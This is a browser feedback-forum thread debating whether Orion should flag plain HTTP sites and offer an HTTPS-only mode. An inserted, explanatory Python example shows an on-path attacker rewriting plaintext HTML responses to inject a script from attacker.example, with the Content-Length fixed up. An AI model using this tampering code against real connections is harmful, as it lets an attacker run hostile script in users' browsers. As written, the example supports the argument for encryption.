
I have to agree with a side comment @nlydv made on his suggestion: https://orionfeedback.org/d/1050-minimal-url-display-option-domain-curpath

Unencrypted lock side note

Seems like Orion just hides the lock icon for http websites. As someone technically knowledgeable enough to know what it means, I personally like that as a design choice, but for most people I think some sort of alternative indicator for plain http sites should probably be visible.

In that case I'd suggest lock.slash.fill (i.e. 􀎣 ) to clearly indicate the lack of security in a given window.

…and as a small related feature, I'd also suggest flagging / calling out such "HTTP-only" sites in the Window menu.

WHY?

It would help surface the importance of secure browsing to non-tech users and remind/promote the value of your "Automatic HTTPS upgrade" setting, and by extension Orion's strong focus on respecting (and promoting!) user security and privacy.


    transeunt Note that for most internet users saying something is not secure is an immediate alarm.

    Also, a large number of users do not make a distinction between "the connection is not secure" and "the website is not secure".

    Imagine that this site did not have https. If you show the lock.slash.fill icon the user may be turned off even though

    • site is safe
    • connection is not, but there is nothing on this site to be consumed in a way that requires an encrypted connection anyway

    In other words many http sites are perfectly safe and secure for the user.

    Thoughts?

    Yes, all good points — in practice this suggestion is probably going too far, esp. as you say HTTP is legitimate for content-only sites not offering login etc.

    …and there's not going to be an easy way for Orion to pick out any sites that could/should be running in HTTPS over HTTP.

    Instead I guess the best approach to nudge users into safer territory is to default "Automatic HTTPS upgrade" on (as I think you are) and hope for the best…! 👍

      a month later

      Chrome and Firefox now have an HTTPS-only mode. That would be a nice additional option instead of just having automatic HTTPS upgrades. I also don't see an issue with branding HTTP-only websites as "not secure"; that's how other browsers have been doing it for many years now. It might not always be an actual issue of course, but unencrypted connections inside your web browser can be an opening for attack by any MITM, regardless of what site you're actually trying to visit or whether the content of the site you're trying to use is confidential in any way or not.

      Edit: Didn't talk about security of a website at all, Vlad. But anyway...
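The point made in the post above (that a plaintext connection is an attack opening no matter how harmless the site's content is) is easy to see in code. The following is an added example, not code from this thread or from the Orion project: a minimal model of an on-path attacker (an ISP, a hotspot router, anyone between browser and server) rewriting a plaintext HTTP/1.x response to inject a script into an ordinary "content-only" page, and declining to touch anything it cannot parse, which is what a TLS record looks like from the same vantage point. The sample response, the TLS bytes and the attacker host `attacker.example` are constructed for the example.

```python
"""
Added example (not from the Orion thread or project): an on-path attacker
tampering with a plaintext HTTP response. Nothing here is specific to any
site; the only requirement is that the bytes are readable, i.e. not TLS.
"""

# Hypothetical attacker-controlled script (constructed for the example).
INJECTED = b'<script src="http://attacker.example/x.js"></script>'


def tamper_http_response(raw: bytes, payload: bytes = INJECTED) -> bytes:
    """Rewrite a plaintext HTTP/1.x HTML response in transit.

    Inserts `payload` before </body> and fixes Content-Length so the
    browser accepts the modified response as if the server had sent it.
    Returns `raw` unchanged when it is not an editable HTML response
    (non-HTTP bytes such as a TLS record, non-HTML content, no </body>).
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep or not head.startswith(b"HTTP/1."):
        return raw  # opaque to the attacker (e.g. TLS): cannot be edited

    status_line, *headers = head.split(b"\r\n")

    content_type = next(
        (h for h in headers if h.lower().startswith(b"content-type:")), b""
    )
    if b"text/html" not in content_type.lower():
        return raw  # only HTML gives the attacker a script execution point

    idx = body.lower().rfind(b"</body>")
    if idx < 0:
        return raw

    new_body = body[:idx] + payload + body[idx:]

    # Keep every header, but make Content-Length match the new body so the
    # browser neither truncates the page nor waits for bytes that never come.
    new_headers = [
        b"Content-Length: " + str(len(new_body)).encode()
        if h.lower().startswith(b"content-length:")
        else h
        for h in headers
    ]
    return b"\r\n".join([status_line, *new_headers]) + b"\r\n\r\n" + new_body


def declared_content_length(raw: bytes) -> int:
    """Parse the Content-Length header of an HTTP/1.x response (-1 if absent)."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    for h in head.split(b"\r\n"):
        if h.lower().startswith(b"content-length:"):
            return int(h.split(b":", 1)[1].strip())
    return -1


# Constructed sample: a plain article page served over HTTP, no login, no secrets.
SAMPLE_HTTP = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: 50\r\n"
    b"\r\n"
    b"<html><body><h1>Just an article</h1></body></html>"
)

# Constructed sample: the first bytes of a TLS record (content type 0x16 =
# handshake). The same attacker sees only this for an https:// site.
SAMPLE_TLS_RECORD = b"\x16\x03\x03\x00\x05hello"


if __name__ == "__main__":
    print(tamper_http_response(SAMPLE_HTTP).decode())
    print(tamper_http_response(SAMPLE_TLS_RECORD) == SAMPLE_TLS_RECORD)
```

The attacker never needs to know which site the user wanted; the rewrite keys only on the response being readable HTML, which is why an HTTPS-only mode that refuses plaintext navigation (or warns before it) closes the hole for content-only sites too, not just for pages with logins.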

        7 days later

        jei4 Security of the website has nothing to do with the security of the connection. A site can be https and malicious for the user, and http and perfectly fine. Closing this for lack of a concrete next step.

          16 days later

          Jumping in to clarify my original side note:

          I didn’t necessarily mean to suggest that a plain HTTP indicator ought to flag a site as “not secure” per se… but even a non-aggressive/opinionated icon would probably make for better UX overall.

          Otherwise, for example, a user looking for some lock icon to ensure their connection is encrypted may conclude that the absence of any such icon indicates the “default” state (i.e. no alerts, warnings, peculiarities, etc.), and that if the site was unencrypted, surely the browser would say so somewhere.

          In other words, it would take conscious observation by the user to learn when/why a lock icon is or is not displayed before being able to reliably draw conclusions on the connection state with a simple glance towards the URL bar.

            16 days later

            nlydv Security associated with https indication is misleading to the user. Most users will never be a target of a MITM attack.

            I feel that the whole "https is secure" phrase thing was invented by leading browsers (all of them ad-tech supported) as a way to distract the users from what is really happening on those https sites that are labeled as 'secure' - a tremendous amount of privacy invasion and tracking. Not sure that we want to be a part of that, need to think more about it.

              11 days later

              Vlad Fair enough. I tend to share a critical view of the whole CA system/industry. Even still, there always exists at least one omnipresent “MITM” to shield against in the form of your ISP and this obviously also has much deeper security/privacy implications in certain parts of the world and for certain types of people.

              Then again I’m sure it wouldn’t be hard to go on forever debating the nuances of a number of potential scenarios that a typical user could care less about.
